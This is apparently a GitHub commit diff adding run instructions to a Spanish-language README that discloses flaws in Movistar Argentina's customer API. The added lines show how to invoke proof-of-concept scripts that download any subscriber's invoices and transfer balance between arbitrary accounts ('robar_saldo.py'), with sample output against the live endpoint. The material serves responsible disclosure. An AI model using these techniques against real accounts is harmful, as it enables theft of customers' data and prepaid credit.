Actualizado el readme con instrucciones de como ejecutar los scripts,…

… junto con la instalacion de dependencias
sebikul · Nov 14, 2016 · ccd9009 · ccd9009
1 parent f24374a
commit ccd9009
Show file tree

Hide file tree

Showing 2 changed files with 15 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -82,7 +82,13 @@ Y en el cuerpo, encontraremos un documento PDF del comprobante del período soli
 # POC
 
 En el archivo [bajar_facturas.py](./bajar_facturas.py) se programo una aplicacion que automatiza lo explicado anteriormente, y descarga todas las facturas disponibles para un numero de telefono dado.
+Para poder ejecutarlo, se deben instalar las dependencias de Python 3 necesarias:
 
+    $ pip install -r requirements.txt
+
+Luego, podemos proceder a ejecutar el programa:
+
+    $ ./bajar_facturas.py
     Ingrese el numero de telefono: 1112345678
     Token: eyJhbGciOiJIUzI1NiJ9.eyJl...
     Encontradas facturas para fechas :['2016-02-04', '2016-03-04', ...]
@@ -128,6 +134,14 @@ En caso de resultar exitosa la transferencia, se recibirá como respuesta el sig
 
 En el archivo [robar_saldo.py](./robar_saldo.py) se encuentra un programa de ejemplo que explota ésta vulnerabilidad, y permite hacer transferencia entre dos cuentas cualquiera.
 
+    $ ./robar_saldo.py
+    Ingrese el numero de telefono victima: 1141234567
+    Ingrese el numero de telefono destino: 1141234567
+    Ingrese el saldo a robar: 1
+    Token: eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzkxNz...
+    Posting request to: https://mi.movistar.com.ar/v1/recarga/cargamesaldo
+    Response: {'data': {'responseMessage': 'OK', 'responseCode': '000'}, 'date': '2016-11-13 ...', 'status': 200}
+
 # Timeline
 
 - 21/08/2016: Primer contacto con Movistar Argentina via Twitter (@movistararg)

diff --git a/requirements.txt b/requirements.txt
@@ -0,0 +1 @@
+requests==2.11.1